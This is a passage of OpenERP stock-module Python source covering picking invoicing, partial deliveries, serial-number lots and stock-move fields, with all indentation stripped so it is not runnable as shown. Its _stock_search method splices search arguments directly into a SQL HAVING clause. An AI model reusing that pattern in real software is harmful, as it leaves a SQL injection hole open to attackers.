uos_id = move_line.product_uos and move_line.product_uos.id or False
if not uos_id and invoice_vals['type'] in ('out_invoice', 'out_refund'):
uos_id = move_line.product_uom.id
return {
'name': name,
'origin': origin,
'invoice_id': invoice_id,
'uos_id': uos_id,
'product_id': move_line.product_id.id,
'account_id': account_id,
'price_unit': self._get_price_unit_invoice(cr, uid, move_line, invoice_vals['type']),
'discount': self._get_discount_invoice(cr, uid, move_line),
'quantity': move_line.product_uos_qty or move_line.product_qty,
'invoice_line_tax_id': [(6, 0, self._get_taxes_invoice(cr, uid, move_line, invoice_vals['type']))],
'account_analytic_id': self._get_account_analytic_invoice(cr, uid, picking, move_line),
}
def action_invoice_create(self, cr, uid, ids, journal_id=False,
group=False, type='out_invoice', context=None):
""" Creates invoice based on the invoice state selected for picking.
@param journal_id: Id of journal
@param group: Whether to create a group invoice or not
@param type: Type invoice to be created
@return: Ids of created invoices for the pickings
"""
if context is None:
context = {}
invoice_obj = self.pool.get('account.invoice')
invoice_line_obj = self.pool.get('account.invoice.line')
partner_obj = self.pool.get('res.partner')
invoices_group = {}
res = {}
inv_type = type
for picking in self.browse(cr, uid, ids, context=context):
if picking.invoice_state != '2binvoiced':
continue
partner = self._get_partner_to_invoice(cr, uid, picking, context=context)
if isinstance(partner, int):
partner = partner_obj.browse(cr, uid, [partner], context=context)[0]
if not partner:
raise osv.except_osv(_('Error, no partner!'),
                    _('Please put a partner on the picking list if you want to generate an invoice.'))
if not inv_type:
inv_type = self._get_invoice_type(picking)
invoice_vals = self._prepare_invoice(cr, uid, picking, partner, inv_type, journal_id, context=context)
if group and partner.id in invoices_group:
invoice_id = invoices_group[partner.id]
invoice = invoice_obj.browse(cr, uid, invoice_id)
invoice_vals_group = self._prepare_invoice_group(cr, uid, picking, partner, invoice, context=context)
invoice_obj.write(cr, uid, [invoice_id], invoice_vals_group, context=context)
else:
invoice_id = invoice_obj.create(cr, uid, invoice_vals, context=context)
invoices_group[partner.id] = invoice_id
res[picking.id] = invoice_id
for move_line in picking.move_lines:
if move_line.state == 'cancel':
continue
if move_line.scrapped:
                    # do not invoice scrapped products
continue
vals = self._prepare_invoice_line(cr, uid, group, picking, move_line,
invoice_id, invoice_vals, context=context)
if vals:
invoice_line_id = invoice_line_obj.create(cr, uid, vals, context=context)
self._invoice_line_hook(cr, uid, move_line, invoice_line_id)
invoice_obj.button_compute(cr, uid, [invoice_id], context=context,
set_total=(inv_type in ('in_invoice', 'in_refund')))
self.write(cr, uid, [picking.id], {
'invoice_state': 'invoiced',
}, context=context)
self._invoice_hook(cr, uid, picking, invoice_id)
self.write(cr, uid, res.keys(), {
'invoice_state': 'invoiced',
}, context=context)
return res
def test_done(self, cr, uid, ids, context=None):
""" Test whether the move lines are done or not.
@return: True or False
"""
ok = False
for pick in self.browse(cr, uid, ids, context=context):
if not pick.move_lines:
return True
for move in pick.move_lines:
if move.state not in ('cancel','done'):
return False
if move.state=='done':
ok = True
return ok
def test_cancel(self, cr, uid, ids, context=None):
""" Test whether the move lines are canceled or not.
@return: True or False
"""
for pick in self.browse(cr, uid, ids, context=context):
for move in pick.move_lines:
if move.state not in ('cancel',):
return False
return True
def allow_cancel(self, cr, uid, ids, context=None):
for pick in self.browse(cr, uid, ids, context=context):
if not pick.move_lines:
return True
for move in pick.move_lines:
if move.state == 'done':
raise osv.except_osv(_('Error!'), _('You cannot cancel the picking as some moves have been done. You should cancel the picking lines.'))
return True
def unlink(self, cr, uid, ids, context=None):
move_obj = self.pool.get('stock.move')
if context is None:
context = {}
for pick in self.browse(cr, uid, ids, context=context):
if pick.state in ['done','cancel']:
# retrieve the string value of field in user's language
state = dict(self.fields_get(cr, uid, context=context)['state']['selection']).get(pick.state, pick.state)
raise osv.except_osv(_('Error!'), _('You cannot remove the picking which is in %s state!')%(state,))
else:
ids2 = [move.id for move in pick.move_lines]
ctx = context.copy()
ctx.update({'call_unlink':True})
if pick.state != 'draft':
#Cancelling the move in order to affect Virtual stock of product
move_obj.action_cancel(cr, uid, ids2, ctx)
#Removing the move
move_obj.unlink(cr, uid, ids2, ctx)
return super(stock_picking, self).unlink(cr, uid, ids, context=context)
# FIXME: needs refactoring, this code is partially duplicated in stock_move.do_partial()!
def do_partial(self, cr, uid, ids, partial_datas, context=None):
""" Makes partial picking and moves done.
@param partial_datas : Dictionary containing details of partial picking
                          like partner_id, delivery_date,
delivery moves with product_id, product_qty, uom
@return: Dictionary of values
"""
if context is None:
context = {}
else:
context = dict(context)
res = {}
move_obj = self.pool.get('stock.move')
uom_obj = self.pool.get('product.uom')
sequence_obj = self.pool.get('ir.sequence')
wf_service = netsvc.LocalService("workflow")
for pick in self.browse(cr, uid, ids, context=context):
new_picking = None
complete, too_many, too_few = [], [], []
move_product_qty, prodlot_ids, product_avail, partial_qty, uos_qty, product_uoms = {}, {}, {}, {}, {}, {}
for move in pick.move_lines:
if move.state in ('done', 'cancel'):
continue
partial_data = partial_datas.get('move%s'%(move.id), {})
product_qty = partial_data.get('product_qty',0.0)
move_product_qty[move.id] = product_qty
product_uom = partial_data.get('product_uom', move.product_uom.id)
product_price = partial_data.get('product_price',0.0)
product_currency = partial_data.get('product_currency',False)
prodlot_id = partial_data.get('prodlot_id')
prodlot_ids[move.id] = prodlot_id
product_uoms[move.id] = product_uom
partial_qty[move.id] = uom_obj._compute_qty(cr, uid, product_uoms[move.id], product_qty, move.product_uom.id)
uos_qty[move.id] = move.product_id._compute_uos_qty(product_uom, product_qty, move.product_uos) if product_qty else 0.0
if move.product_qty == partial_qty[move.id]:
complete.append(move)
elif move.product_qty > partial_qty[move.id]:
too_few.append(move)
else:
too_many.append(move)
if (pick.type == 'in') and (move.product_id.cost_method == 'average'):
# Record the values that were chosen in the wizard, so they can be
# used for average price computation and inventory valuation
move_obj.write(cr, uid, [move.id],
{'price_unit': product_price,
'price_currency_id': product_currency})
# every line of the picking is empty, do not generate anything
empty_picking = not any(q for q in move_product_qty.values() if q > 0)
for move in too_few:
product_qty = move_product_qty[move.id]
if not new_picking and not empty_picking:
new_picking_name = pick.name
self.write(cr, uid, [pick.id],
{'name': sequence_obj.get(cr, uid,
'stock.picking.%s'%(pick.type)),
})
pick.refresh()
new_picking = self.copy(cr, uid, pick.id,
{
'name': new_picking_name,
'move_lines' : [],
'state':'draft',
})
if product_qty != 0:
defaults = {
'product_qty' : product_qty,
'product_uos_qty': uos_qty[move.id],
'picking_id' : new_picking,
'state': 'assigned',
'move_dest_id': False,
'price_unit': move.price_unit,
'product_uom': product_uoms[move.id]
}
prodlot_id = prodlot_ids[move.id]
if prodlot_id:
defaults.update(prodlot_id=prodlot_id)
move_obj.copy(cr, uid, move.id, defaults)
move_obj.write(cr, uid, [move.id],
{
'product_qty': move.product_qty - partial_qty[move.id],
'product_uos_qty': move.product_uos_qty - uos_qty[move.id],
'prodlot_id': False,
'tracking_id': False,
})
if new_picking:
move_obj.write(cr, uid, [c.id for c in complete], {'picking_id': new_picking})
for move in complete:
defaults = {'product_uom': product_uoms[move.id], 'product_qty': move_product_qty[move.id]}
if prodlot_ids.get(move.id):
defaults.update({'prodlot_id': prodlot_ids[move.id]})
move_obj.write(cr, uid, [move.id], defaults)
for move in too_many:
product_qty = move_product_qty[move.id]
defaults = {
'product_qty' : product_qty,
'product_uos_qty': uos_qty[move.id],
'product_uom': product_uoms[move.id]
}
prodlot_id = prodlot_ids.get(move.id)
if prodlot_ids.get(move.id):
defaults.update(prodlot_id=prodlot_id)
if new_picking:
defaults.update(picking_id=new_picking)
move_obj.write(cr, uid, [move.id], defaults)
# At first we confirm the new picking (if necessary)
if new_picking:
wf_service.trg_validate(uid, 'stock.picking', new_picking, 'button_confirm', cr)
# Then we finish the good picking
self.write(cr, uid, [pick.id], {'backorder_id': new_picking})
self.action_move(cr, uid, [new_picking], context=context)
wf_service.trg_validate(uid, 'stock.picking', new_picking, 'button_done', cr)
wf_service.trg_write(uid, 'stock.picking', pick.id, cr)
delivered_pack_id = new_picking
self.message_post(cr, uid, new_picking, body=_("Back order <em>%s</em> has been <b>created</b>.") % (pick.name), context=context)
elif empty_picking:
delivered_pack_id = pick.id
else:
self.action_move(cr, uid, [pick.id], context=context)
wf_service.trg_validate(uid, 'stock.picking', pick.id, 'button_done', cr)
delivered_pack_id = pick.id
delivered_pack = self.browse(cr, uid, delivered_pack_id, context=context)
res[pick.id] = {'delivered_picking': delivered_pack.id or False}
return res
# views associated to each picking type
_VIEW_LIST = {
'out': 'view_picking_out_form',
'in': 'view_picking_in_form',
'internal': 'view_picking_form',
}
def _get_view_id(self, cr, uid, type):
"""Get the view id suiting the given type
@param type: the picking type as a string
        @return: view id, or False if no view found
"""
res = self.pool.get('ir.model.data').get_object_reference(cr, uid,
'stock', self._VIEW_LIST.get(type, 'view_picking_form'))
return res and res[1] or False
class stock_production_lot(osv.osv):
def name_get(self, cr, uid, ids, context=None):
if not ids:
return []
reads = self.read(cr, uid, ids, ['name', 'prefix', 'ref'], context)
res = []
for record in reads:
name = record['name']
prefix = record['prefix']
if prefix:
name = prefix + '/' + name
if record['ref']:
name = '%s [%s]' % (name, record['ref'])
res.append((record['id'], name))
return res
def name_search(self, cr, uid, name, args=None, operator='ilike', context=None, limit=100):
args = args or []
ids = []
if name:
ids = self.search(cr, uid, [('prefix', '=', name)] + args, limit=limit, context=context)
if not ids:
ids = self.search(cr, uid, [('name', operator, name)] + args, limit=limit, context=context)
else:
ids = self.search(cr, uid, args, limit=limit, context=context)
return self.name_get(cr, uid, ids, context)
_name = 'stock.production.lot'
_description = 'Serial Number'
def _get_stock(self, cr, uid, ids, field_name, arg, context=None):
""" Gets stock of products for locations
@return: Dictionary of values
"""
if context is None:
context = {}
if 'location_id' not in context:
locations = self.pool.get('stock.location').search(cr, uid, [('usage', '=', 'internal')], context=context)
else:
locations = context['location_id'] and [context['location_id']] or []
if isinstance(ids, (int, long)):
ids = [ids]
res = {}.fromkeys(ids, 0.0)
if locations:
cr.execute('''select
prodlot_id,
sum(qty)
from
stock_report_prodlots
where
location_id IN %s and prodlot_id IN %s group by prodlot_id''',(tuple(locations),tuple(ids),))
res.update(dict(cr.fetchall()))
return res
def _stock_search(self, cr, uid, obj, name, args, context=None):
""" Searches Ids of products
@return: Ids of locations
"""
locations = self.pool.get('stock.location').search(cr, uid, [('usage', '=', 'internal')])
cr.execute('''select
prodlot_id,
sum(qty)
from
stock_report_prodlots
where
location_id IN %s group by prodlot_id
having sum(qty) '''+ str(args[0][1]) + str(args[0][2]),(tuple(locations),))
res = cr.fetchall()
ids = [('id', 'in', map(lambda x: x[0], res))]
return ids
_columns = {
'name': fields.char('Serial Number', size=64, required=True, help="Unique Serial Number, will be displayed as: PREFIX/SERIAL [INT_REF]"),
'ref': fields.char('Internal Reference', size=256, help="Internal reference number in case it differs from the manufacturer's serial number"),
'prefix': fields.char('Prefix', size=64, help="Optional prefix to prepend when displaying this serial number: PREFIX/SERIAL [INT_REF]"),
'product_id': fields.many2one('product.product', 'Product', required=True, domain=[('type', '<>', 'service')]),
'date': fields.datetime('Creation Date', required=True),
'stock_available': fields.function(_get_stock, fnct_search=_stock_search, type="float", string="Available", select=True,
help="Current quantity of products with this Serial Number available in company warehouses",
digits_compute=dp.get_precision('Product Unit of Measure')),
'revisions': fields.one2many('stock.production.lot.revision', 'lot_id', 'Revisions'),
'company_id': fields.many2one('res.company', 'Company', select=True),
'move_ids': fields.one2many('stock.move', 'prodlot_id', 'Moves for this serial number', readonly=True),
}
_defaults = {
'date': lambda *a: time.strftime('%Y-%m-%d %H:%M:%S'),
'name': lambda x, y, z, c: x.pool.get('ir.sequence').get(y, z, 'stock.lot.serial'),
'product_id': lambda x, y, z, c: c.get('product_id', False),
}
_sql_constraints = [
('name_ref_uniq', 'unique (name, ref, product_id, company_id)', 'The combination of Serial Number, internal reference, Product and Company must be unique !'),
]
def action_traceability(self, cr, uid, ids, context=None):
""" It traces the information of a product
@param self: The object pointer.
@param cr: A database cursor
@param uid: ID of the user currently logged in
@param ids: List of IDs selected
@param context: A standard dictionary
@return: A dictionary of values
"""
value=self.pool.get('action.traceability').action_traceability(cr,uid,ids,context)
return value
def copy(self, cr, uid, id, default=None, context=None):
context = context or {}
default = default and default.copy() or {}
default.update(date=time.strftime('%Y-%m-%d %H:%M:%S'), move_ids=[])
return super(stock_production_lot, self).copy(cr, uid, id, default=default, context=context)
stock_production_lot()
class stock_production_lot_revision(osv.osv):
_name = 'stock.production.lot.revision'
_description = 'Serial Number Revision'
_columns = {
'name': fields.char('Revision Name', size=64, required=True),
'description': fields.text('Description'),
'date': fields.date('Revision Date'),
'indice': fields.char('Revision Number', size=16),
'author_id': fields.many2one('res.users', 'Author'),
'lot_id': fields.many2one('stock.production.lot', 'Serial Number', select=True, ondelete='cascade'),
'company_id': fields.related('lot_id','company_id',type='many2one',relation='res.company',string='Company', store=True, readonly=True),
}
_defaults = {
'author_id': lambda x, y, z, c: z,
'date': fields.date.context_today,
}
stock_production_lot_revision()
# ----------------------------------------------------
# Move
# ----------------------------------------------------
#
# Fields:
#   location_dest_id is only used for predicting future stocks
#
class stock_move(osv.osv):
def _getSSCC(self, cr, uid, context=None):
cr.execute('select id from stock_tracking where create_uid=%s order by id desc limit 1', (uid,))
res = cr.fetchone()
return (res and res[0]) or False
_name = "stock.move"
_description = "Stock Move"
_order = 'date_expected desc, id'
_log_create = False
def action_partial_move(self, cr, uid, ids, context=None):
if context is None: context = {}
if context.get('active_model') != self._name:
context.update(active_ids=ids, active_model=self._name)
partial_id = self.pool.get("stock.partial.move").create(
cr, uid, {}, context=context)
return {
'name':_("Products to Process"),
'view_mode': 'form',
'view_id': False,
'view_type': 'form',
'res_model': 'stock.partial.move',
'res_id': partial_id,
'type': 'ir.actions.act_window',
'nodestroy': True,
'target': 'new',
'domain': '[]',
'context': context
}
def name_get(self, cr, uid, ids, context=None):
res = []
for line in self.browse(cr, uid, ids, context=context):
name = line.location_id.name+' > '+line.location_dest_id.name
# optional prefixes
if line.product_id.code:
name = line.product_id.code + ': ' + name
if line.picking_id.origin:
name = line.picking_id.origin + '/ ' + name
res.append((line.id, name))
return res
def _check_tracking(self, cr, uid, ids, context=None):
""" Checks if serial number is assigned to stock move or not.
@return: True or False
"""
for move in self.browse(cr, uid, ids, context=context):
if not move.prodlot_id and \
(move.state == 'done' and \
( \
(move.product_id.track_production and move.location_id.usage == 'production') or \
(move.product_id.track_production and move.location_dest_id.usage == 'production') or \
(move.product_id.track_incoming and move.location_id.usage == 'supplier') or \
(move.product_id.track_outgoing and move.location_dest_id.usage == 'customer') or \
(move.product_id.track_incoming and move.location_id.usage == 'inventory') \
)):
return False
return True
def _check_product_lot(self, cr, uid, ids, context=None):
""" Checks whether move is done or not and production lot is assigned to that move.
@return: True or False
"""
for move in self.browse(cr, uid, ids, context=context):
if move.prodlot_id and move.state == 'done' and (move.prodlot_id.product_id.id != move.product_id.id):
return False
return True
_columns = {
'name': fields.char('Description', required=True, select=True),
'priority': fields.selection([('0', 'Not urgent'), ('1', 'Urgent')], 'Priority'),
'create_date': fields.datetime('Creation Date', readonly=True, select=True),
'date': fields.datetime('Date', required=True, select=True, help="Move date: scheduled date until move is done, then date of actual move processing", states={'done': [('readonly', True)]}),
'date_expected': fields.datetime('Scheduled Date', states={'done': [('readonly', True)]},required=True, select=True, help="Scheduled date for the processing of this move"),
'product_id': fields.many2one('product.product', 'Product', required=True, select=True, domain=[('type','<>','service')],states={'done': [('readonly', True)]}),
'product_qty': fields.float('Quantity', digits_compute=dp.get_precision('Product Unit of Measure'),
required=True,states={'done': [('readonly', True)]},
help="This is the quantity of products from an inventory "
"point of view. For moves in the state 'done', this is the "
"quantity of products that were actually moved. For other "
"moves, this is the quantity of product that is planned to "
"be moved. Lowering this quantity does not generate a "
"backorder. Changing this quantity on assigned moves affects "
"the product reservation, and should be done with care."
),
'product_uom': fields.many2one('product.uom', 'Unit of Measure', required=True,states={'done': [('readonly', True)]}),
'product_uos_qty': fields.float('Quantity (UOS)', digits_compute=dp.get_precision('Product Unit of Measure'), states={'done': [('readonly', True)]}),
'product_uos': fields.many2one('product.uom', 'Product UOS', states={'done': [('readonly', True)]}),
'product_packaging': fields.many2one('product.packaging', 'Packaging', help="It specifies attributes of packaging like type, quantity of packaging,etc."),
'location_id': fields.many2one('stock.location', 'Source Location', required=True, select=True,states={'done': [('readonly', True)]}, help="Sets a location if you produce at a fixed location. This can be a partner location if you subcontract the manufacturing operations."),
'location_dest_id': fields.many2one('stock.location', 'Destination Location', required=True,states={'done': [('readonly', True)]}, select=True, help="Location where the system will stock the finished products."),
'partner_id': fields.many2one('res.partner', 'Destination Address ', states={'done': [('readonly', True)]}, help="Optional address where goods are to be delivered, specifically used for allotment"),
        'prodlot_id': fields.many2one('stock.production.lot', 'Serial Number', help="Serial number used to track the products being moved", select=True, ondelete='restrict'),
'tracking_id': fields.many2one('stock.tracking', 'Pack', select=True, states={'done': [('readonly', True)]}, help="Logistical shipping unit: pallet, box, pack ..."),
'auto_validate': fields.boolean('Auto Validate'),
'move_dest_id': fields.many2one('stock.move', 'Destination Move', help="Optional: next stock move when chaining them", select=True),
'move_history_ids': fields.many2many('stock.move', 'stock_move_history_ids', 'parent_id', 'child_id', 'Move History (child moves)'),
'move_history_ids2': fields.many2many('stock.move', 'stock_move_history_ids', 'child_id', 'parent_id', 'Move History (parent moves)'),
'picking_id': fields.many2one('stock.picking', 'Reference', select=True,states={'done': [('readonly', True)]}),
'note': fields.text('Notes'),
'state': fields.selection([('draft', 'New'),
('cancel', 'Cancelled'),
('waiting', 'Waiting Another Move'),
('confirmed', 'Waiting Availability'),
('assigned', 'Available'),
('done', 'Done'),
], 'Status', readonly=True, select=True,
help= "* New: When the stock move is created and not yet confirmed.\n"\
"* Waiting Another Move: This state can be seen when a move is waiting for another one, for example in a chained flow.\n"\
"* Waiting Availability: This state is reached when the procurement resolution is not straight forward. It may need the scheduler to run, a component to me manufactured...\n"\
"* Available: When products are reserved, it is set to \'Available\'.\n"\
"* Done: When the shipment is processed, the state is \'Done\'."),
'price_unit': fields.float('Unit Price', digits_compute= dp.get_precision('Product Price'), help="Technical field used to record the product cost set by the user during a picking confirmation (when average price costing method is used)"),
'price_currency_id': fields.many2one('res.currency', 'Currency for average price', help="Technical field used to record the currency chosen by the user during a picking confirmation (when average price costing method is used)"),
'company_id': fields.many2one('res.company', 'Company', required=True, select=True),
'backorder_id': fields.related('picking_id','backorder_id',type='many2one', relation="stock.picking", string="Back Order of", select=True),
'origin': fields.related('picking_id','origin',type='char', size=64, relation="stock.picking", string="Source", store=True),
# used for colors in tree views:
'scrapped': fields.related('location_dest_id','scrap_location',type='boolean',relation='stock.location',string='Scrapped', readonly=True),
'type': fields.related('picking_id', 'type', type='selection', selection=[('out', 'Sending Goods'), ('in', 'Getting Goods'), ('internal', 'Internal')], string='Shipping Type'),
}
def _check_location(self, cr, uid, ids, context=None):
for record in self.browse(cr, uid, ids, context=context):
if (record.state=='done') and (record.location_id.usage == 'view'):
raise osv.except_osv(_('Error'), _('You cannot move product %s from a location of type view %s.')% (record.product_id.name, record.location_id.name))
if (record.state=='done') and (record.location_dest_id.usage == 'view' ):
raise osv.except_osv(_('Error'), _('You cannot move product %s to a location of type view %s.')% (record.product_id.name, record.location_dest_id.name))
return True
_constraints = [
(_check_tracking,
'You must assign a serial number for this product.',
['prodlot_id']),
(_check_location, 'You cannot move products from or to a location of the type view.',
['location_id','location_dest_id']),
(_check_product_lot,
'You try to assign a lot which is not from the same product.',
['prodlot_id'])]
def _default_location_destination(self, cr, uid, context=None):
""" Gets default address of partner for destination location
@return: Address id or False
"""
mod_obj = self.pool.get('ir.model.data')
picking_type = context.get('picking_type')
location_id = False
if context is None:
context = {}
if context.get('move_line', []):
if context['move_line'][0]:
if isinstance(context['move_line'][0], (tuple, list)):
location_id = context['move_line'][0][2] and context['move_line'][0][2].get('location_dest_id',False)
else:
move_list = self.pool.get('stock.move').read(cr, uid, context['move_line'][0], ['location_dest_id'])
location_id = move_list and move_list['location_dest_id'][0] or False
elif context.get('address_out_id', False):
property_out = self.pool.get('res.partner').browse(cr, uid, context['address_out_id'], context).property_stock_customer
location_id = property_out and property_out.id or False
else:
location_xml_id = False
if picking_type in ('in', 'internal'):
location_xml_id = 'stock_location_stock'
elif picking_type == 'out':
location_xml_id = 'stock_location_customers'
if location_xml_id:
try:
location_model, location_id = mod_obj.get_object_reference(cr, uid, 'stock', location_xml_id)
with tools.mute_logger('openerp.osv.orm'):
self.pool.get('stock.location').check_access_rule(cr, uid, [location_id], 'read', context=context)
except (orm.except_orm, ValueError):
location_id = False
return location_id
def _default_location_source(self, cr, uid, context=None):
""" Gets default address of partner for source location
@return: Address id or False
"""
mod_obj = self.pool.get('ir.model.data')
picking_type = context.get('picking_type')
location_id = False
if context is None:
context = {}
if context.get('move_line', []):
try:
location_id = context['move_line'][0][2]['location_id']
except:
pass
elif context.get('address_in_id', False):
part_obj_add = self.pool.get('res.partner').browse(cr, uid, context['address_in_id'], context=context)
if part_obj_add:
location_id = part_obj_add.property_stock_supplier.id
else:
location_xml_id = False
if picking_type == 'in':
location_xml_id = 'stock_location_suppliers'
elif picking_type in ('out', 'internal'):
location_xml_id = 'stock_location_stock'
if location_xml_id:
try:
location_model, location_id = mod_obj.get_object_reference(cr, uid, 'stock', location_xml_id)
with tools.mute_logger('openerp.osv.orm'):
self.pool.get('stock.location').check_access_rule(cr, uid, [location_id], 'read', context=context)
except (orm.except_orm, ValueError):
location_id = False
return location_id
def _default_destination_address(self, cr, uid, context=None):
user = self.pool.get('res.users').browse(cr, uid, uid, context=context)
return user.company_id.partner_id.id
def _default_move_type(self, cr, uid, context=None):
""" Gets default type of move
@return: type
"""
if context is None:
context = {}
picking_type = context.get('picking_type')
type = 'internal'
if picking_type == 'in':
type = 'in'
elif picking_type == 'out':
type = 'out'
return type
_defaults = {
'location_id': _default_location_source,
'location_dest_id': _default_location_destination,
'partner_id': _default_destination_address,
'type': _default_move_type,
'state': 'draft',
'priority': '1',
'product_qty': 1.0,
'scrapped' : False,
'date': lambda *a: time.strftime('%Y-%m-%d %H:%M:%S'),
'company_id': lambda self,cr,uid,c: self.pool.get('res.company')._company_default_get(cr, uid, 'stock.move', context=c),
'date_expected': lambda *a: time.strftime('%Y-%m-%d %H:%M:%S'),
}
def write(self, cr, uid, ids, vals, context=None):
if isinstance(ids, (int, long)):
ids = [ids]
if uid != 1:
frozen_fields = set(['product_qty', 'product_uom', 'product_uos_qty', 'product_uos', 'location_id', 'location_dest_id', 'product_id'])
for move in self.browse(cr, uid, ids, context=context):
if move.state == 'done':
if frozen_fields.intersection(vals):
raise osv.except_osv(_('Operation Forbidden!'),
_('Quantities, Units of Measure, Products and Locations cannot be modified on stock moves that have already been processed (except by the Administrator).'))
return super(stock_move, self).write(cr, uid, ids, vals, context=context)
def copy_data(self, cr, uid, id, default=None, context=None):
if default is None:
default = {}
default = default.copy()
default.setdefault('tracking_id', False)
default.setdefault('prodlot_id', False)
default.setdefault('move_history_ids', [])
default.setdefault('move_history_ids2', [])
return super(stock_move, self).copy_data(cr, uid, id, default, context=context)
def _auto_init(self, cursor, context=None):
res = super(stock_move, self)._auto_init(cursor, context=context)
cursor.execute('SELECT indexname \
FROM pg_indexes \
WHERE indexname = \'stock_move_location_id_location_dest_id_product_id_state\'')
if not cursor.fetchone():
cursor.execute('CREATE INDEX stock_move_location_id_location_dest_id_product_id_state \
ON stock_move (product_id, state, location_id, location_dest_id)')
return res
def onchange_lot_id(self, cr, uid, ids, prodlot_id=False, product_qty=False,
loc_id=False, product_id=False, uom_id=False, context=None):
""" On change of production lot gives a warning message.
@param prodlot_id: Changed production lot id
@param product_qty: Quantity of product
@param loc_id: Location id
@param product_id: Product id
@return: Warning message
"""
if not prodlot_id or not loc_id:
return {}
ctx = context and context.copy() or {}
ctx['location_id'] = loc_id
ctx.update({'raise-exception': True})
uom_obj = self.pool.get('product.uom')
product_obj = self.pool.get('product.product')
product_uom = product_obj.browse(cr, uid, product_id, context=ctx).uom_id
prodlot = self.pool.get('stock.production.lot').browse(cr, uid, prodlot_id, context=ctx)
location = self.pool.get('stock.location').browse(cr, uid, loc_id, context=ctx)
uom = uom_obj.browse(cr, uid, uom_id, context=ctx)
amount_actual = uom_obj._compute_qty_obj(cr, uid, product_uom, prodlot.stock_available, uom, context=ctx)
warning = {}
if (location.usage == 'internal') and (product_qty > (amount_actual or 0.0)):
warning = {
'title': _('Insufficient Stock for Serial Number !'),
'message': _('You are moving %.2f %s but only %.2f %s available for this serial number.') % (product_qty, uom.name, amount_actual, uom.name)
}
return {'warning': warning}
def onchange_quantity(self, cr, uid, ids, product_id, product_qty,
product_uom, product_uos):
""" On change of product quantity finds UoM and UoS quantities
@param product_id: Product id
@param product_qty: Changed Quantity of product
@param product_uom: Unit of measure of product
@param product_uos: Unit of sale of product
@return: Dictionary of values
"""
result = {
'product_uos_qty': 0.00
}
warning = {}
if (not product_id) or (product_qty <=0.0):
result['product_qty'] = 0.0
return {'value': result}
product_obj = self.pool.get('product.product')
uos_coeff = product_obj.read(cr, uid, product_id, ['uos_coeff'])
# Warn if the quantity was decreased
if ids:
for move in self.read(cr, uid, ids, ['product_qty']):
if product_qty < move['product_qty']:
warning.update({
'title': _('Information'),
'message': _("By changing this quantity here, you accept the "
"new quantity as complete: OpenERP will not "
"automatically generate a back order.") })
break
if product_uos and product_uom and (product_uom != product_uos):
result['product_uos_qty'] = product_qty * uos_coeff['uos_coeff']
else:
result['product_uos_qty'] = product_qty
return {'value': result, 'warning': warning}
def onchange_uos_quantity(self, cr, uid, ids, product_id, product_uos_qty,
product_uos, product_uom):
""" On change of product quantity finds UoM and UoS quantities
@param product_id: Product id
@param product_uos_qty: Changed UoS Quantity of product
@param product_uom: Unit of measure of product
@param product_uos: Unit of sale of product
@return: Dictionary of values
"""
result = {
'product_qty': 0.00
}
if (not product_id) or (product_uos_qty <=0.0):
result['product_uos_qty'] = 0.0
return {'value': result}
product_obj = self.pool.get('product.product')
uos_coeff = product_obj.read(cr, uid, product_id, ['uos_coeff'])
# No warning if the quantity was decreased to avoid double warnings:
# The clients should call onchange_quantity too anyway
if product_uos and product_uom and (product_uom != product_uos):
result['product_qty'] = product_uos_qty / uos_coeff['uos_coeff']
else:
result['product_qty'] = product_uos_qty
return {'value': result}
def onchange_product_id(self, cr, uid, ids, prod_id=False, loc_id=False,
loc_dest_id=False, partner_id=False):
""" On change of product id, if finds UoM, UoS, quantity and UoS quantity.
@param prod_id: Changed Product id
@param loc_id: Source location id
@param loc_dest_id: Destination location id
@param partner_id: Address id of partner
@return: Dictionary of values
"""
if not prod_id:
return {}
user = self.pool.get('res.users').browse(cr, uid, uid)
lang = user and user.lang or False
if partner_id:
addr_rec = self.pool.get('res.partner').browse(cr, uid, partner_id)
if addr_rec:
lang = addr_rec and addr_rec.lang or False
ctx = {'lang': lang}
product = self.pool.get('product.product').browse(cr, uid, [prod_id], context=ctx)[0]
uos_id = product.uos_id and product.uos_id.id or False
result = {
'name': product.partner_ref,
'product_uom': product.uom_id.id,
'product_uos': uos_id,
'product_qty': 1.00,
'product_uos_qty' : self.pool.get('stock.move').onchange_quantity(cr, uid, ids, prod_id, 1.00, product.uom_id.id, uos_id)['value']['product_uos_qty'],
'prodlot_id' : False,
}
if loc_id:
result['location_id'] = loc_id
if loc_dest_id:
result['location_dest_id'] = loc_dest_id
return {'value': result}
def onchange_move_type(self, cr, uid, ids, type, context=None):
""" On change of move type gives sorce and destination location.
@param type: Move Type
@return: Dictionary of values
"""
mod_obj = self.pool.get('ir.model.data')
location_source_id = 'stock_location_stock'
location_dest_id = 'stock_location_stock'
if type == 'in':
location_source_id = 'stock_location_suppliers'
location_dest_id = 'stock_location_stock'
elif type == 'out':
location_source_id = 'stock_location_stock'
location_dest_id = 'stock_location_customers'
try:
source_location = mod_obj.get_object_reference(cr, uid, 'stock', location_source_id)
with tools.mute_logger('openerp.osv.orm'):
self.pool.get('stock.location').check_access_rule(cr, uid, [source_location[1]], 'read', context=context)
except (orm.except_orm, ValueError):
source_location = False
try:
dest_location = mod_obj.get_object_reference(cr, uid, 'stock', location_dest_id)
with tools.mute_logger('openerp.osv.orm'):
self.pool.get('stock.location').check_access_rule(cr, uid, [dest_location[1]], 'read', context=context)
except (orm.except_orm, ValueError):
dest_location = False
return {'value':{'location_id': source_location and source_location[1] or False, 'location_dest_id': dest_location and dest_location[1] or False}}
def onchange_date(self, cr, uid, ids, date, date_expected, context=None):
""" On change of Scheduled Date gives a Move date.
@param date_expected: Scheduled Date
@param date: Move Date
@return: Move Date
"""
if not date_expected:
date_expected = time.strftime('%Y-%m-%d %H:%M:%S')
return {'value':{'date': date_expected}}
def _chain_compute(self, cr, uid, moves, context=None):
""" Finds whether the location has chained location type or not.
@param moves: Stock moves
@return: Dictionary containing destination location with chained location type.
"""
result = {}
for m in moves:
dest = self.pool.get('stock.location').chained_location_get(
cr,
uid,
m.location_dest_id,
m.picking_id and m.picking_id.partner_id and m.picking_id.partner_id,
m.product_id,
context
)
if dest:
if dest[1] == 'transparent':
newdate = (datetime.strptime(m.date, '%Y-%m-%d %H:%M:%S') + relativedelta(days=dest[2] or 0)).strftime('%Y-%m-%d')
self.write(cr, uid, [m.id], {
'date': newdate,
'location_dest_id': dest[0].id})
if m.picking_id and (dest[3] or dest[5]):
self.pool.get('stock.picking').write(cr, uid, [m.picking_id.id], {
'stock_journal_id': dest[3] or m.picking_id.stock_journal_id.id,
'type': dest[5] or m.picking_id.type
}, context=context)
m.location_dest_id = dest[0]
res2 = self._chain_compute(cr, uid, [m], context=context)
for pick_id in res2.keys():
result.setdefault(pick_id, [])
